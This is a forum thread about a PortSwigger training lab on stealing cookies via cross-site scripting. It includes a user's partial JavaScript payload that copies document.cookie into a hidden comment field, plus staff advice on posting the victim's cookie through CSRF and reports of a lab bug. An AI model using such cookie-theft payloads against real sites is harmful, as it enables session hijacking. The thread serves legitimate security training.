how am i supposed to steal cookies from this lab
"Lab: Exploiting cross-site scripting to steal cookies" without having burp professional and without using Burp Collaborator client
I've tried redirecting users to my site and making everyone that visits the blog post a comment
but none of there two seems to work
<input required type="hidden" name="postId" value="4">
<input type="hidden" id="coke" value="" name="comment">
<input required type="hidden" value="majname" name="name">
<input required type="hidden" value="email@example.com" name="email">
var a_csrf = document.getElementsByName('csrf').value
document.getElementById('coke').value = document.cookie;
var inp = document.createElement('input');
this is my payload for commenting
it works on myself but no bot seems to visit the blog tho
Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.
Hi, the previous comment is valid and not written by a bot. If you were able to perform that action you would force the emulated admin user to submit their cookie as a comment, which you could then retrieve from the blog post and submit in your request to solve the lab.
I have just checked the lab and It is working as intended as I have been able to solve it. There is a lab which allows you to practice exploiting XSS to perform CSRF at the following link which you could use to help you: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf
I have even tried to inject very simple HTML tags, like these below, but only HTTP connection I ever received was mine:
Is there any other test you suggest I could perform to validate that the bot is visiting my post? Because clearly, it looks that he is not.
Thanks for this report t. I’ve passed on your message to our Web Academy team.
I also saw this video I googled https://www.youtube.com/watch?v=glA5FwCdspk about the solution and I did everything exactly the same way, but as mentioned, have not received the request.
To summarise, it looks like the issue is that the HTTP request is not made to my collaborator, even when my collaborator is working correctly, as I validated via curl - it shows every HTTP request, but not from this lab. There is no possibility I made any typo as I verified everything several times.
Thanks for following up. We’re currently investigating this issue.
This issue should know be resolved.
Please let us know if you need any further assistance.